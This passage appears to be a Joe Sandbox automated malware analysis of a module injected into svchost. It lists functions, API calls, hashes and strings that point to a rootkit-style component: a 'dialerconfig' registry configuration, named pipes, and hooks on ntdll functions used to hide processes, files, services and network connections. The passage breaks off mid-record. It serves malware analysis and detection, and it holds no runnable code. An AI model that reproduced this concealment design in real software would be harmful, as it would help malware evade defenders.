Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 3dc4222100551c49028ce73f7a73d1dcc39ebc02ffcea691b0f8f7d56345dab9
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: DCE12332746AC0AAE720CFB4D1882DD7BB1F3457A8FC98146DE4A57B99DE35C52AC700

Function 0000022857341650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002285734165B
HeapAlloc.KERNEL32 ref: 000002285734166A

Part of subcall function 0000022857341274: GetProcessHeap.KERNEL32 ref: 000002285734127A
Part of subcall function 0000022857341274: HeapAlloc.KERNEL32 ref: 0000022857341289
Part of subcall function 0000022857341274: GetProcessHeap.KERNEL32 ref: 00000228573412A3
Part of subcall function 0000022857341274: HeapAlloc.KERNEL32 ref: 00000228573412B4

RegOpenKeyExW.ADVAPI32 ref: 00000228573416DA
RegOpenKeyExW.ADVAPI32 ref: 0000022857341707
RegCloseKey.ADVAPI32 ref: 0000022857341721
RegOpenKeyExW.ADVAPI32 ref: 0000022857341741
RegCloseKey.ADVAPI32 ref: 000002285734175C
RegOpenKeyExW.ADVAPI32 ref: 000002285734177C
RegCloseKey.ADVAPI32 ref: 0000022857341797
RegOpenKeyExW.ADVAPI32 ref: 00000228573417B7
RegCloseKey.ADVAPI32 ref: 00000228573417D2
RegOpenKeyExW.ADVAPI32 ref: 00000228573417F2
RegCloseKey.ADVAPI32 ref: 000002285734180D
RegOpenKeyExW.ADVAPI32 ref: 000002285734182D
RegCloseKey.ADVAPI32 ref: 0000022857341848
RegOpenKeyExW.ADVAPI32 ref: 0000022857341868
RegCloseKey.ADVAPI32 ref: 0000022857341883
RegOpenKeyExW.ADVAPI32 ref: 00000228573418A3
RegCloseKey.ADVAPI32 ref: 00000228573418BE
RegCloseKey.ADVAPI32 ref: 00000228573418C8

Part of subcall function 00000228573412C8: RegQueryInfoKeyW.ADVAPI32 ref: 0000022857341326
Part of subcall function 00000228573412C8: GetProcessHeap.KERNEL32 ref: 0000022857341334
Part of subcall function 00000228573412C8: HeapAlloc.KERNEL32 ref: 0000022857341345
Part of subcall function 00000228573412C8: RegEnumValueW.ADVAPI32 ref: 00000228573413A1
Part of subcall function 00000228573412C8: GetProcessHeap.KERNEL32 ref: 00000228573413E9
Part of subcall function 00000228573412C8: HeapAlloc.KERNEL32 ref: 00000228573413F7
Part of subcall function 00000228573412C8: GetProcessHeap.KERNEL32 ref: 000002285734141B
Part of subcall function 00000228573412C8: HeapFree.KERNEL32 ref: 0000022857341429
Part of subcall function 00000228573412C8: lstrlenW.KERNEL32 ref: 0000022857341432
Part of subcall function 00000228573412C8: GetProcessHeap.KERNEL32 ref: 0000022857341440
Part of subcall function 00000228573412C8: HeapAlloc.KERNEL32 ref: 000002285734144E

Strings

udp, xrefs: 000002285734189C
startup, xrefs: 00000228573416FD
paths, xrefs: 00000228573417B0
SOFTWARE\dialerconfig, xrefs: 00000228573416BA
tcp_local, xrefs: 0000022857341826
service_names, xrefs: 00000228573417EB
process_names, xrefs: 0000022857341775
tcp_remote, xrefs: 0000022857341861
pid, xrefs: 000002285734173A

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 3f84a73acf843ee66575b964865ce1bd556a37fe976a7ef28a26458dde4a8b7f
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: FB711C26352F94A5EB309FA5E8486D927B5F784BADFCA9111DE4E47B28EF34C464C300

Function 00000228573412C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000022857341326
GetProcessHeap.KERNEL32 ref: 0000022857341334
HeapAlloc.KERNEL32 ref: 0000022857341345
RegEnumValueW.ADVAPI32 ref: 00000228573413A1

Part of subcall function 0000022857341554: StrCmpIW.SHLWAPI ref: 0000022857341585

GetProcessHeap.KERNEL32 ref: 00000228573413E9
HeapAlloc.KERNEL32 ref: 00000228573413F7
GetProcessHeap.KERNEL32 ref: 000002285734141B
HeapFree.KERNEL32 ref: 0000022857341429
lstrlenW.KERNEL32 ref: 0000022857341432
GetProcessHeap.KERNEL32 ref: 0000022857341440
HeapAlloc.KERNEL32 ref: 000002285734144E
StrCpyW.SHLWAPI ref: 0000022857341470
GetProcessHeap.KERNEL32 ref: 0000022857341485
HeapFree.KERNEL32 ref: 0000022857341493

Strings

d, xrefs: 0000022857341365

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: e46ecd34de491d1308ae671b3df10de9fef00b3886dbf8a7e2b9c0c573285798
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: E9516E76255B84A3EB24DFA2F54C3DAB3A2F788B95F898124DA4907B14DF38C165C740

Function 0000022857341EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000022857341EBF

Part of subcall function 0000022857342174: GetModuleHandleA.KERNEL32 ref: 000002285734218C
Part of subcall function 0000022857342174: GetProcAddress.KERNEL32 ref: 000002285734219D

Part of subcall function 0000022857345C10: GetCurrentThreadId.KERNEL32 ref: 0000022857345C4B

Strings

NtQueryDirectoryFileEx, xrefs: 0000022857341F3C
ntdll.dll, xrefs: 0000022857341ECD
NtEnumerateKey, xrefs: 0000022857341F59
NtQueryDirectoryFile, xrefs: 0000022857341F1F
NtQuerySystemInformation, xrefs: 0000022857341EE5
EnumServicesStatusExW, xrefs: 0000022857341FB1, 0000022857341FD2
NtEnumerateValueKey, xrefs: 0000022857341F76
NtResumeThread, xrefs: 0000022857341F02
advapi32.dll, xrefs: 0000022857341F97, 0000022857341FB8
EnumServiceGroupW, xrefs: 0000022857341F90
NtDeviceIoControlFile, xrefs: 0000022857341FF6
sechost.dll, xrefs: 0000022857341FD9

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: fbe4b5adc516a5eddbc243521723434f71a1688b5a9f644da282da4dda07529c
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: F831B3681C398AB0EA38EFE5EC5DAD42772A784365FCFC413D51926161DE38C66DD380

Function 00000228573423F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000022857342405
GetCurrentProcessId.KERNEL32 ref: 000002285734240F

Part of subcall function 00000228573419AC: OpenProcess.KERNEL32 ref: 00000228573419CA
Part of subcall function 00000228573419AC: IsWow64Process.KERNEL32 ref: 00000228573419E0
Part of subcall function 00000228573419AC: CloseHandle.KERNEL32 ref: 00000228573419FB

CreateFileW.KERNEL32 ref: 0000022857342468
WriteFile.KERNEL32 ref: 0000022857342490
ReadFile.KERNEL32 ref: 00000228573424AF
CloseHandle.KERNEL32 ref: 00000228573424B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 000002285734243F
\\.\pipe\dialerchildproc64, xrefs: 0000022857342438

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 7b1a3d2e8bd2e090555e159a9445707a5f70035fb9d4eac54959877080a9ef02
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: D8216036655B80A2E7208B64F4083DA67A1F388BA9FD58215EA5907BA8CF3CC159CB01

Function 000002285734104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000228573410AB
RegEnumValueW.ADVAPI32 ref: 000002285734110E
GetProcessHeap.KERNEL32 ref: 0000022857341155
HeapAlloc.KERNEL32 ref: 0000022857341163
GetProcessHeap.KERNEL32 ref: 0000022857341187
HeapFree.KERNEL32 ref: 0000022857341195

Strings

d, xrefs: 00000228573410CE

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: ad3198d32289a49e06ad33bfb93fbc502d432e11c06c414e9de5030c3d1c1ccf
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 8D418037255B80A7E7648FA2E4487DAB7B1F389B98F858125DB8907B54DF38D164CB00

Function 0000022856DC69F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000022856DC6A18
__scrt_acquire_startup_lock.LIBCMT ref: 0000022856DC6A6A
_RTC_Initialize.LIBCMT ref: 0000022856DC6A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000022856DC6ABE
__scrt_release_startup_lock.LIBCMT ref: 0000022856DC6AE9

Memory Dump Source

Source File: 00000023.00000002.2666251689.0000022856DC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022856DC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22856dc0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 7a9754e5eb38a2b8641e60c33c9fbb1816f07f7ec6e98aac3ce565dff8c00e6f
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 84810A216032FDB6FA60ABE795493596EE1E7857C0FC64C25AA0483792DF3BE4F58700

Function 00000228573475F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000022857347618
__scrt_acquire_startup_lock.LIBCMT ref: 000002285734766A
_RTC_Initialize.LIBCMT ref: 0000022857347698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000228573476BE
__scrt_release_startup_lock.LIBCMT ref: 00000228573476E9

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: ebc5aaea30edebd99cff85e416f84b025dac92da709ea1e2499ee6fd6e7ae24d
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 0581F439793281BEF6789BE9984D3E92B93BB457B0FCEC4159A0447792DF38C8658700

Function 0000022857349804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 0000022857349889
GetLastError.KERNEL32 ref: 0000022857349897
LoadLibraryExW.KERNEL32 ref: 00000228573498C1
FreeLibrary.KERNEL32 ref: 0000022857349907
GetProcAddress.KERNEL32 ref: 0000022857349913

Strings

api-ms-, xrefs: 00000228573498A9

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: d492d3f8460d3f1b2afc8d99dbde564883a34e82d2ca179cebf861482d39d944
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: DC319235353790B5EE3A9B96A80C7D96395B708BB4FDF85259D2E4B380EF38C4658301

Function 0000022857351B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteConsoleW.KERNEL32 ref: 0000022857351BCD
GetLastError.KERNEL32 ref: 0000022857351BD9
CloseHandle.KERNEL32 ref: 0000022857351BF1
CreateFileW.KERNEL32 ref: 0000022857351C1C
WriteConsoleW.KERNEL32 ref: 0000022857351C3B

Strings

CONOUT$, xrefs: 0000022857351BFD

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 1c0b566392a894ce74d1a2a5efa9d3973cab8f3438b6384f0615cc180b3866e0
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: EB11E221365BC092E3609B92F8483D973A0F388FF6FCA8214EA5E83794DF78C5648740

Function 0000022857345C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000022857345C4B
GetThreadContext.KERNEL32 ref: 0000022857345DB5

Part of subcall function 0000022857345A40: GetCurrentThreadId.KERNEL32 ref: 0000022857345A44

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: 93da57e044ac3ae80c67ebd2e8dbfc6c880df14108594d047bc108f3e8dd5d49
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 28D1FF7A24AB88D1DA74DB4AE4883DA77A1F3C8B94F954112EACD47BA5CF7CC550CB00

Function 00000228573430B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000228573430D7
HeapAlloc.KERNEL32 ref: 00000228573430EA
StrCmpNIW.SHLWAPI ref: 000002285734316B
GetProcessHeap.KERNEL32 ref: 00000228573431D1
HeapFree.KERNEL32 ref: 00000228573431DF

Strings

dialer, xrefs: 0000022857343164

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: a0daccf823996c067a86fa09c03b9d8a5e1f46a35afff0a237ff4f77f514c89e
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 18319625742B55A2EB39EF96E84C2E963A1FB447A4FCEC0209E4917B54EF38C471C700

Function 0000022857341A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000022857341A3A
K32GetModuleFileNameExW.KERNEL32 ref: 0000022857341A58
PathFindFileNameW.SHLWAPI ref: 0000022857341A67
lstrlenW.KERNEL32 ref: 0000022857341A73
StrCpyW.SHLWAPI ref: 0000022857341A86
CloseHandle.KERNEL32 ref: 0000022857341A94

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 915b2379584f7df0a632634847399da20923e9df1468f2e28b1afa0e7bb7b020
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 0A015B21351A81A6EA24DBA2F45C3D963A1F788FE5FC98435CE8943754DE38C9958700

Function 00000228573437AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000228573437C8
GetCurrentProcess.KERNEL32 ref: 00000228573437D6
VirtualProtectEx.KERNEL32 ref: 00000228573437F8
GetCurrentProcess.KERNEL32 ref: 0000022857343819
VirtualProtectEx.KERNEL32 ref: 000002285734383A
TerminateThread.KERNEL32 ref: 0000022857343849

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 43c8ea52249c02bb21e0f8a4fa768338954e79fd9a400e3d2438eca7d1dfd263
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 46116D64243780A2FB349BA1F40D7D6A3A0BB58BA6FC98424CD4907754EF3CC028C701

Function 00000228573490F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000022857349103
_IsNonwritableInCurrentImage.LIBCMT ref: 0000022857349198
RtlUnwindEx.NTDLL ref: 00000228573491E7

Strings

csm, xrefs: 000002285734917E
f, xrefs: 0000022857349116

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 10beaee80716bc3576468719ef79da16d6fdeb3a57295b261bc1e58f0539cb79
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 9F51903A252608AAEB28CB95E44CBD937A6F344BA8FDBC120DA0647748EF35C851C700

Function 00000228573490D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000022857349103
_IsNonwritableInCurrentImage.LIBCMT ref: 0000022857349198
RtlUnwindEx.NTDLL ref: 00000228573491E7

Strings

csm, xrefs: 000002285734917E
f, xrefs: 0000022857349116

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 42b5be0db8dc193396612feac8ad71e6e22ca8813cd0844f2462be9b5340a1e2
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: D131E236242640AAE738DF51E84C7D937A6F344BA8FDAC514AE4A07749EF38C960C704

Function 0000022857341AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000022857341AD8
StrCmpNIW.SHLWAPI ref: 0000022857341AF2
lstrlenW.KERNEL32 ref: 0000022857341B01
StrCpyW.SHLWAPI ref: 0000022857341B16

Strings

\\?\, xrefs: 0000022857341AE6

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: d287926d172b14a3920ec9d194854bd4705244a328a9dd93fc190e726f20327c
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 2BF06862355A85A2E7309BA1F4DD3D96761F744BA9FC9C030CA4947654DF3CC65CC700

Function 0000022857343200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 0000022857343222
StrCpyW.SHLWAPI ref: 0000022857343232
StrCatW.SHLWAPI ref: 000002285734323E
PathCombineW.SHLWAPI ref: 000002285734324C

Strings

\\.\pipe\, xrefs: 0000022857343218

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 7a189cc5b3e0ac64df03ad72c19cb0302b8b7844002c46ccadef67033c8e8b93
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: B1F08914345BC4A1EA248B93F90D1D56751AB48FE5FCDC131DD5607B18CE2CC4618300

Function 000002285734A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002285734A154
GetProcAddress.KERNEL32 ref: 000002285734A16A
FreeLibrary.KERNEL32 ref: 000002285734A187

Strings

mscoree.dll, xrefs: 000002285734A14B
CorExitProcess, xrefs: 000002285734A163

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 009d929ce34719471038627e190f201fdee39ffaf4dafa816e995b7fced992ba
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: ECF01265353B84B1EF694BE0F88C3E52371EB48BA6FCEA419990B46564DF2CC4A8C700

Function 00000228573451B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000022857345236

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: b8521d710e2e482cbc39c345c869ac12c9d0b329fd711427e872344bf5425420
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 1A022F3665AB8096E764CB96F48839EB7A1F3C4790F954015EA8E87B68DFBCC454CF00

Function 0000022857350860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000228573508A2
GetConsoleMode.KERNEL32 ref: 0000022857350960
GetLastError.KERNEL32 ref: 00000228573509EA

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: dbbb7410a0ca34c502ce4d196777196c8a955fc1d8409f85e6e06a832f46a1d5
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 3881E2226926C0A9FB709BF0D8487ED27A1F744BA6FCE8155DE0A67691DF36C461C320

Function 00000228573457F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000022857345806

Memory Dump Source

Source File: 00000023.00000002.2667336285.0000022857340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022857340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_22857340000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: 9f5c3c80e97e5326b8b05dd76de718a8f5b382610195b601782d6dcc67c419e7
